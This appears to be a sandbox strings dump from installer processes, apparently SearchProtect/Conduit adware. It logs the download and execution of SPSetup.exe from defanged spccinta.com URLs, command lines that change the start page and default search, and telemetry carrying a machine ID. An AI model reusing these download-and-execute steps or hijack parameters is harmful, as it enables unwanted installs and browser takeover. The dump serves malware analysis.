SHLWAPI.dll
SetProcessShutdownParameters
KERNEL32.dll
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>KWindows
6MsgIDs
Msgs
UrlMon
.rsrc
@.reloc
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
shlwapi.dll
SOFTWARE\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion\ProfileReconciliation
RegKey
GetWindowsDirectoryA
RegOpenKeyA
RegCreateKeyExA
SHFOLDER.dll
dll\shfolder.dbg
Font.Color
Font.Height
Font.Name
Font.Style
OnKeyDown
Lines.Strings
name="JR.Inno.Setup"
version="1.0.0.0"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
%s_%d
USER32.DLL
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
uxtheme.dll
DWMAPI.DLL
clWebSnow
clWebFloralWhite
clWebLavenderBlush
clWebOldLace
clWebIvory
clWebCornSilk
clWebBeige
clWebAntiqueWhite
clWebWheat
clWebAliceBlue
clWebGhostWhite
clWebLavender
clWebSeashell
clWebLightYellow
clWebPapayaWhip
clWebNavajoWhite
clWebMoccasin
clWebBurlywood
clWebAzure
clWebMintcream
clWebHoneydew
clWebLinen
clWebLemonChiffon
clWebBlanchedAlmond
clWebBisque
clWebPeachPuff
clWebTan
clWebYellow
clWebDarkOrange
clWebRed
clWebDarkRed
clWebMaroon
clWebIndianRed
clWebSalmon
clWebCoral
clWebGold
clWebTomato
clWebCrimson
clWebBrown
clWebChocolate
clWebSandyBrown
clWebLightSalmon
clWebLightCoral
clWebOrange
clWebOrangeRed
clWebFirebrick
clWebSaddleBrown
clWebSienna
clWebPeru
clWebDarkSalmon
clWebRosyBrown
clWebPaleGoldenrod
clWebLightGoldenrodYellow
clWebOlive
clWebForestGreen
clWebGreenYellow
clWebChartreuse
clWebLightGreen
clWebAquamarine
clWebSeaGreen
clWebGoldenRod
clWebKhaki
clWebOliveDrab
clWebGreen
clWebYellowGreen
clWebLawnGreen
clWebPaleGreen
clWebMediumAquamarine
clWebMediumSeaGreen
clWebDarkGoldenRod
clWebDarkKhaki
clWebDarkOliveGreen
clWebDarkgreen
clWebLimeGreen
clWebLime
clWebSpringGreen
clWebMediumSpringGreen
clWebDarkSeaGreen
clWebLightSeaGreen
clWebPaleTurquoise
clWebLightCyan
clWebLightBlue
clWebLightSkyBlue
clWebCornFlowerBlue
clWebDarkBlue
clWebIndigo
clWebMediumTurquoise
clWebTurquoise
clWebCyan
clWebPowderBlue
clWebSkyBlue
clWebRoyalBlue
clWebMediumBlue
clWebMidnightBlue
clWebDarkTurquoise
clWebCadetBlue
clWebDarkCyan
clWebTeal
clWebDeepskyBlue
clWebDodgerBlue
clWebBlue
clWebNavy
clWebDarkViolet
clWebDarkOrchid
clWebMagenta
clWebDarkMagenta
clWebMediumVioletRed
clWebPaleVioletRed
clWebBlueViolet
clWebMediumOrchid
clWebMediumPurple
clWebPurple
clWebDeepPink
clWebLightPink
clWebViolet
clWebOrchid
clWebPlum
clWebThistle
clWebHotPink
clWebPink
clWebLightSteelBlue
clWebMediumSlateBlue
clWebLightSlateGray
clWebWhite
clWebLightgrey
clWebGray
clWebSteelBlue
clWebSlateBlue
clWebSlateGray
clWebWhiteSmoke
clWebSilver
clWebDimGray
clWebMistyRose
clWebDarkSlateBlue
clWebDarkSlategray
clWebGainsboro
clWebDarkGray
clWebBlack
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
crSQLWait
%s (%s)
imm32.dll
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
RegDeleteKeyExW
.DEFAULT\Control Panel\International
%s, ClassID: %s
%s, ProgID: "%s"
oleacc.dll
MSFTEDIT.DLL
RICHED20.DLL
Rstrtmgr.dll
File I/O error %d
Messages file "%s" is missing. Please correct the problem or obtain a new copy of the program.
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
WININIT.INI
Software\Microsoft\Windows\CurrentVersion\SharedDLLs
RegCreateKeyEx
RegOpenKeyEx
sfc.dll
cmd.exe" /C "
COMMAND.COM" /C
PendingFileRenameOperations
PendingFileRenameOperations2
@Software\Microsoft\Windows\CurrentVersion\Fonts
Software\Microsoft\Windows NT\CurrentVersion\Fonts
IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)
IPropertyStore::SetValue(PKEY_AppUserModel_ID)
IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)
IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)
OLEAUT32.DLL
Log opened. (Time zone: UTC%s%.2u:%.2u)
%s Log %s #%.3u.txt
regsvr32.exe"
Cannot register 64-bit DLLs on this version of Windows
HELPER_EXE_AMD64
Cannot utilize 64-bit features on this version of Windows
64-bit helper EXE wasn't extracted
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x
CreateNamedPipe
helper %d 0x%x
Helper process PID: %u
Stopping 64-bit helper process. (PID: %u)
Helper process exited with failure code: 0x%x
TransactNamedPipe/GetOverlappedResult
Helper: Command did not execute
SOFTWARE\Microsoft\.NETFramework
.NET Framework not found
SOFTWARE\Microsoft\.NETFramework\Policy\v4.0
v4.0.30319
SOFTWARE\Microsoft\.NETFramework\Policy\v2.0
v2.0.50727
SOFTWARE\Microsoft\.NETFramework\Policy\v1.1
v1.1.4322
.NET Framework version %s not found
Fusion.dll
Failed to load .NET Framework DLL "%s"
Failed to get address of .NET Framework CreateAssemblyCache function
.NET Framework CreateAssemblyCache function failed
MoveFileEx failed (%d).
Deleting directory: %s
Failed to delete directory (%d). Will retry later.
Failed to delete directory (%d). Will delete on restart (if empty).
Failed to delete directory (%d).
Deleting file: %s
Failed to delete the file; it may be in use (%d).
The file appears to be in use (%d). Will delete on restart.
Decrementing shared count (%d-bit): %s
Unregistering 64-bit DLL/OCX: %s
Unregistering 32-bit DLL/OCX: %s
Not unregistering DLL/OCX again: %s
Unregistering 64-bit type library: %s
Unregistering 32-bit type library: %s
Uninstalling from GAC: %s
Running Exec filename:
Running Exec parameters:
CreateProcess failed (%d).
Process exit code: %u
Running ShellExec filename:
Running ShellExec parameters:
ShellExecuteEx failed (%d).
Skipping RunOnceId "%s" filename: %s
Unregistering font: %s
zlib: Internal error. Code %d
bzlib: Internal error. Code %d
lzmadecomp: %s
lzmadecomp: Compressed data is corrupted (%d)
DecodeToBuf failed (%d)
c:\directory
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Could not find page with ID %d
Software\Microsoft\Windows\CurrentVersion\Uninstall
%s\%s_is1
RestartManager found an application using one of our files: %s
Can use RestartManager to avoid reboot? %s (%d)
PrepareToInstall failed: %s
Need to restart Windows? %s
/:*?"<>|
\/:*?"<>|
%s-%d.bin
%s-%d%s.bin
..\DISK%d\
Asking user for new disk containing "%s".
Cannot read an encrypted file before the key has been set
LoggedMsgBox returned an unexpected value. Assuming Abort.
Software\Microsoft\Windows\CurrentVersion\Fonts
Software\Microsoft\Windows\CurrentVersion\Uninstall\
5.5.4 (u)
URLInfoAbout
URLUpdateInfo
Creating directory: %s
Setting permissions on directory: %s
Failed to set permissions on directory (%d).
Setting NTFS compression on directory: %s
Unsetting NTFS compression on directory: %s
Failed to set NTFS compression state (%d).
Failed to set value in Fonts registry key.
Failed to open Fonts registry key.
Setting permissions on file: %s
Failed to set permissions on file (%d).
Setting NTFS compression on file: %s
Unsetting NTFS compression on file: %s
Dest filename: %s
Dest file is protected by Windows File Protection.
Time stamp of our file: %s
Time stamp of existing file: %s
Version of our file: %u.%u.%u.%u
Version of existing file: %u.%u.%u.%u
Existing file is protected by Windows File Protection. Skipping.
Uninstaller requires administrator: %s
The existing file appears to be in use (%d). Will replace on restart.
The existing file appears to be in use (%d). Retrying.
Registering file as a font ("%s")Cannot install files to 64-bit locations on this version of Windows
desktop.ini
.ShellClassInfo
{0AFACED1-E828-11D1-9187-B532F1E9575D}target.lnk
Filename: %s
Desktop.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\
Setting permissions on registry key: %s\%s
Could not set permissions on the registry key because it currently does not exist.
Failed to set permissions on registry key (%d).
Cannot access 64-bit registry keys on this version of Windows
Registration executable created: %s
Software\Microsoft\Windows\CurrentVersion\RunOnce
Registering 64-bit DLL/OCX: %s
Registering 32-bit DLL/OCX: %s
Registering 64-bit type library: %s
Registering 32-bit type library: %s
Directory for uninstall files: %s
Will append to existing uninstall log: %s
Will overwrite existing uninstall log: %s
Creating new uninstall log: %s
LoggedMsgBox returned an unexpected value. Assuming Cancel.
RmShutdown returned an error: %d
Fatal exception during installation process (%s):
ExtractTemporaryFile: The file "%s" was not found
ExtractTemporaryFiles: No files matching "%s" found
Invalid symbol '%s' found
Invalid token '%s' found
QuerySpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected status: %d
ShellExecuteEx
ShellExecuteEx returned hProcess=0
Wnd=$%x
Expression error '%s'
Password
SuppressMsgBoxes
srcexe
Cannot evaluate "%s" constant during Uninstall
Cannot access a 64-bit key in a "reg" constant on this version of Windows
Unknown custom message name "%s" in "cm" constant
Cannot expand "pf64" constant on this version of Windows
Cannot expand "cf64" constant on this version of Windows
uninstallexe
Cannot expand "dotnet2064" constant on this version of Windows
Cannot expand "dotnet4064" constant on this version of Windows
Failed to expand shell folder constant "%s"
Unknown constant "%s"
Software\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
cmd.exe
COMMAND.COM
\_setup64.tmp
_isetup\_shfoldr.dll
Failed to get version numbers of _shfoldr.dll
shfolder.dll
Failed to load DLL "%s"
Found pending rename or delete that matches one of our files: %s
Windows version: %u.%u.%u%s (NT platform: %s)
64-bit Windows: %s
Processor architecture: %s
Defaulting to %s for suppressed message box (%s):
Message box (%s):
User chose %s.
MsgBox failed.
/SPAWNWND=$%x /NOTIFYWND=$%x
64-bit install mode: %s
_isetup\_isdecmp.dll
_isetup\_iscrypt.dll
/Password=
/SuppressMsgBoxes
/DETACHEDMSG
-0.bin
Setup version: Inno Setup version 5.5.4 (u)
Original Setup EXE:
Not restarting Windows because Setup is being run from the debugger.
Restarting Windows.
Inno Setup version 5.5.4 (u)
Portions Copyright (C) 2000-2013 Martijn Laan
hXXp://VVV.innosetup.com/
hXXp://VVV.remobjects.com/ps
Cannot run files in 64-bit locations on this version of Windows
Type: Exec
Type: ShellExec
RmRestart returned an error: %d
Need to restart Windows, not attempting to restart applications
Will not restart Windows automatically.
RegDeleteKeyExA
System\CurrentControlSet\Control\Windows
Cannot call "%s" function during Setup
Cannot call "%s" function during Uninstall
Invalid RootKey value
Unknown custom message name "%s"
%u.%.2u.%u
%u.%u.%u.%u
Cannot disable FS redirection on this version of Windows
Runtime Error (at %d:%d):
Exception "%s" at address %p
TScriptRunner.SetPSExecParameters: Invalid type
TScriptRunner.LoadScript failed
Remove shared file %s? User chose %s%s
/INITPROCWND=$%x
/SECONDPHASE="%s" /FIRSTPHASEWND=$%x
Original Uninstall EXE:
Install was done in 64-bit mode but not running 64-bit Windows now
Removed all? %s
Not restarting Windows because Uninstall is being run from the debugger.
isRS-???.tmp
isRS-%.3u.tmp
DisableProcessWindowsGhosting
Interface not supported
7Dispatch methods do not support more than 64 parameters
Exception: %s
Cannot Import %s
Unable to insert a line Clipboard does not support Icons
Text exceeds memo capacity/Menu '%s' is already being used by another form
- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.
Error setting %s.Count8Listbox (%s) style must be virtual in order to set Count
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'
No help found for %s
Unsupported clipboard format
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread$No help viewer that supports filters#''%s'' is not a valid integer value
Cannot open file "%s". %s
Invalid file name - %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Resource %s not found"Character index out of bounds (%d)
Start index out of bounds (%d)
Invalid count (%d)
Invalid destination index (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Object lock not owned(Monitor support function not initialized
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation
n%USERPROFILE%
r%SYSTEMROOT%
5.50.4807.2300
Microsoft(R) Windows (R) 2000 Operating System
Datos de programa%Configuraci
51.1052.0.0
conduit_7.exe_1160:
.text
`.rdata
@.data
.ndata
.rsrc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
.oohM(
363X3
FtpCommandW
Filename: %s
.Class 3 Public Primary Certification Authority0
"hXXp://crl.verisign.com/tss-ca.crl0
hXXp://ocsp.verisign.com0
Thawte Certification1
0hXXp://crl.verisign.com/ThawteTimestampingCA.crl0
2Terms of use at hXXps://VVV.verisign.com/rpa (c)09100.
3hXXp://csc3-2009-2-crl.verisign.com/CSC3-2009-2.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0?
3hXXp://csc3-2009-2-aia.verisign.com/CSC3-2009-2.cer0
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif0
hXXp://ocsp.verisign.com01
hXXp://crl.verisign.com/pca3.crl0)
HttpSendRequestW
HttpSendRequestExW
HttpQueryInfoW
FtpCreateDirectoryW
FtpOpenFileW
HttpAddRequestHeadersA
HttpOpenRequestW
HttpAddRequestHeadersW
HttpEndRequestW
InternetCrackUrlW
WININET.dll
inetc.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.1-Unicode</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv5B.exe -carrier_type=ctid -carrier_id=CT3317919 -platform=all -startpage=true -defaultsearch=true -sessionid=M5BC16161-589A-4851-BD46-F690E029EDAB -downloadlength=1344 -EXT_ISID=false
= hXXp://sp-storage.spccinta.com/stub/spstub.exe
20140813163110.388 , END - .onInit
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx5A.tmp\System.dll
ls.dll
~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx5A.tmp
~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx5A.tmp\System.dll
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
Wwininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
/password
Uploading %s
Open URL Error
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsa5C.tmp
M5BC16161-589A-4851-BD46-F690E029EDAB
nsa5C.tmp
NET~1.TXT
0140813163111.747
ALS~1\Temp\nsv5B.tmp
p://sp-storage.spccinta.com/stub/spstub.exe
813163110.403
20140813163111.747
Stub_Init", "installation_session_id":"M5BC16161-589A-4851-BD46-F690E029EDAB","environment":"", "command_line":"-carrier_type=ctid -carrier_id=CT3317919 -platform=all -startpage=true -defaultsearch=true", "EXT_ISID":"false", "carrier_ID":"CT3317919", "machine_ID":"EKJNFOKBHYL0T9WVJBV51RDIFZBUNYG5DTPLXS6/L4XADDH0APOUL9DCL8QKGBJF7POGZ5NARVQASWHBVUSBYG", "installer_version":"1.1.2.4", "origin":""}
63111.747
0140813
63110.403
"%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU/Wmain/conduit_7.exe" -carrier_type=ctid -carrier_id=CT3317919 -platform=all -startpage=true -defaultsearch=true
%Program Files%\SearchProtect
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx5A.tmp
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain
conduit_7.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh58.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\Wmain\conduit_7.exe
20140813163111.606 , Downloaded url from hXXps://c-sp-download.spccint.com/downloadstub/ service
20140813163111.606 , SPStubUrl = hXXp://sp-storage.spccinta.com/stub/spstub.exe
hXXps://c-sp-download.spccint.com/downloadstub/
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv5B.exe
hXXp://sp-storage.spccinta.com/stub/spstub.exe
{"event_type":"MiniStub_Init", "installation_session_id":"M5BC16161-589A-4851-BD46-F690E029EDAB","environment":"", "command_line":"-carrier_type=ctid -carrier_id=CT3317919 -platform=all -startpage=true -defaultsearch=true", "EXT_ISID":"false", "carrier_ID":"CT3317919", "machine_ID":"EKJNFOKBHYL0T9WVJBV51RDIFZBUNYG5DTPLXS6/L4XADDH0APOUL9DCL8QKGBJF7POGZ5NARVQASWHBVUSBYG", "installer_version":"1.1.2.4", "origin":""}C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\inet.txt
1.1.2.4
nsv5B.exe_2124:
.text
`.rdata
@.data
.ndata
.rsrc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
.ia*u
:"G%X
"hXXp://crl.verisign.com/tss-ca.crl0
hXXp://ocsp.verisign.com0
Thawte Certification1
0hXXp://crl.verisign.com/ThawteTimestampingCA.crl0
2Terms of use at hXXps://VVV.verisign.com/rpa (c)09100.
3hXXp://csc3-2009-2-crl.verisign.com/CSC3-2009-2.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0?
3hXXp://csc3-2009-2-aia.verisign.com/CSC3-2009-2.cer0
.Class 3 Public Primary Certification Authority0
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif0
hXXp://ocsp.verisign.com01
hXXp://crl.verisign.com/pca3.crl0)
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
hXXps://d.symcb.com/cps0%
hXXps://d.symcb.com/rpa0
hXXp://sv.symcb.com/sv.crl0W
hXXp://sv.symcd.com0&
hXXp://sv.symcb.com/sv.crt0
<VeriSign Class 3 Public Primary Certification Authority - G50
hXXp://s2.symcb.com0
hXXp://VVV.symauth.com/cps0(
hXXp://VVV.symauth.com/rpa00
hXXp://s1.symcb.com/pca3-g5.crl0
@.reloc
MSVCRT.dll
HttpSendRequestW
HttpSendRequestExW
HttpQueryInfoW
FtpCreateDirectoryW
FtpOpenFileW
HttpAddRequestHeadersA
HttpOpenRequestW
HttpAddRequestHeadersW
HttpEndRequestW
InternetCrackUrlW
WININET.dll
inetc.dll
FtpCommandW
Filename: %s
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.1-Unicode</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
ME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy5F.tmp\StubUtils.dll
CALS~1/Temp/nsn60.tmp","ProcessCommandLine" : "-carrier_type=ctid -carrier_id=CT3317919 -platform=all -startpage=true -defaultsearch=true -sessionid=M5BC16161-589A-4851-BD46-F690E029EDAB -downloadlength=1344 -EXT_ISID=false -installerdownloadlength=4031"}
20140813163120.950 , Executing: C:/DOCUME~1/adm/LOCALS~1/Temp/nsn60.tmp -carrier_type=ctid -carrier_id=CT3317919 -platform=all -startpage=true -defaultsearch=true -sessionid=M5BC16161-589A-4851-BD46-F690E029EDAB -downloadlength=1344 -EXT_ISID=false -installerdownloadlength=4031
_version":"5.1", "Installer_download_time_sec":"5", "Installer_url":"hXXp://sp-storage.spccinta.com/Installer/2.16.20.192/SPSetup.exe", "ExtraData":""}
Inetc::get (0) Going to Download from hXXp://sp-storage.spccinta.com/Installer/2.16.20.192/SPSetup.exe to C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn60.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy5F.tmp\StubUtils.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy5F.tmp
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
Wwininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
/password
Uploading %s
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\inet.txt2_M5BC16161-589A-4851-BD46-F690E029EDAB_{62264CE0-DC07-46CF-8346-BF7874D12303}inet.txt2_M5BC16161-589A-4851-BD46-F690E029EDAB_{62264CE0-DC07-46CF-8346-BF7874D12303}INET~1.TXT
0140813163120.950
ALS~1\Temp\nsn60.tmp
p://sp-storage.spccinta.com/Installer/2.16.20.192/SPSetup.exe
-carrier_type=ctid -carrier_id=CT3317919 -platform=all -startpage=true -defaultsearch=true -sessionid=M5BC16161-589A-4851-BD46-F690E029EDAB -downloadlength=1344 -EXT_ISID=false -installerdownloadlength=4031
C:/DOCUME~1/adm/LOCALS~1/Temp/nsn60.tmp
{"function": 1013, "ProcessPath" : "C:/DOCUME~1/adm/LOCALS~1/Temp/nsn60.tmp","ProcessCommandLine" : "-carrier_type=ctid -carrier_id=CT3317919 -platform=all -startpage=true -defaultsearch=true -sessionid=M5BC16161-589A-4851-BD46-F690E029EDAB -downloadlength=1344 -EXT_ISID=false -installerdownloadlength=4031"}false", "download_length": "1344", "carrier_ID": "CT3317919", "carrier_type": "ctid", "carrier_version": "DEFAULT", "brand": "SP", "EXT_ISID":"false","machine_ID":"EKJNFOKBHYL0T9WVJBV51RDIFZBUNYG5DTPLXS6/L4XADDH0APOUL9DCL8QKGBJF7POGZ5NARVQASWHBVUSBYG","installer_version":"2.4.3.0","result":"success","reason":"0" , "log":"10#6-0#", "OS_name":"Microsoft Windows XP Professional Service Pack 3 (build 2600)", "OS_version":"5.1", "Installer_download_time_sec":"5", "Installer_url":"hXXp://sp-storage.spccinta.com/Installer/2.16.20.192/SPSetup.exe", "ExtraData":""}
"function": 1013, "ProcessPath" : "C:/DOCUME~1/adm/LOCALS~1/Temp/nsn60.tmp","ProcessCommandLine" : "-carrier_type=ctid -carrier_id=CT3317919 -platform=all -startpage=true -defaultsearch=true -sessionid=M5BC16161-589A-4851-BD46-F690E029EDAB -downloadlength=1344 -EXT_ISID=false -installerdownloadlength=4031"}
carrier_type=ctid -carrier_id=CT3317919 -platform=all -startpage=true -defaultsearch=true -sessionid=M5BC16161-589A-4851-BD46-F690E029EDAB -downloadlength=1344 -EXT_ISID=false -installerdownloadlength=4031
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv5B.exe -carrier_type=ctid -carrier_id=CT3317919 -platform=all -startpage=true -defaultsearch=true -sessionid=M5BC16161-589A-4851-BD46-F690E029EDAB -downloadlength=1344 -EXT_ISID=false
%Program Files%\SearchProtect
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nsv5B.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi5D.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv5B.exe
hXXp://sp-storage.spccinta.com/Installer/2.16.20.192/SPSetup.exe
.0.0.0
115.75 , SPSetupUrl = hXXp://sp-storage.spccinta.com/Installer/2.16.20.192/SPSetup.exe
20140813163115.91 , Inetc::get (0) Going to Download from hXXp://sp-storage.spccinta.com/Installer/2.16.20.192/SPSetup.exe to C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn60.tmp
hXXp://sp-download.spccint.com/download/CarrierId/CT3317919/CarrierVersion/DEFAULT/CarrierType/ctid/Brand/SP
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn60.txt
M5BC16161-589A-4851-BD46-F690E029EDAB
{62264CE0-DC07-46CF-8346-BF7874D12303}{"event_type":"Stub_DownloadComplete", "installation_session_id":"M5BC16161-589A-4851-BD46-F690E029EDAB", "environment":"", "command_line":"-carrier_type=ctid -carrier_id=CT3317919 -platform=all -startpage=true -defaultsearch=true -sessionid=M5BC16161-589A-4851-BD46-F690E029EDAB -downloadlength=1344 -EXT_ISID=false", "download_length": "1344", "carrier_ID": "CT3317919", "carrier_type": "ctid", "carrier_version": "DEFAULT", "brand": "SP", "EXT_ISID":"false","machine_ID":"EKJNFOKBHYL0T9WVJBV51RDIFZBUNYG5DTPLXS6/L4XADDH0APOUL9DCL8QKGBJF7POGZ5NARVQASWHBVUSBYG","installer_version":"2.4.3.0","result":"success","reason":"0" , "log":"10#6-0#", "OS_name":"Microsoft Windows XP Professional Service Pack 3 (build 2600)", "OS_version":"5.1", "Installer_download_time_sec":"5", "Installer_url":"hXXp://sp-storage.spccinta.com/Installer/2.16.20.192/SPSetup.exe", "ExtraData":""}C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\inet.txt
2.4.3.0
AdvancedSystemProtector.exe_640_rwx_041C0000_00010000:
{05%{@5%{
nsn60.tmp_2460:
.text
`.rdata
@.data
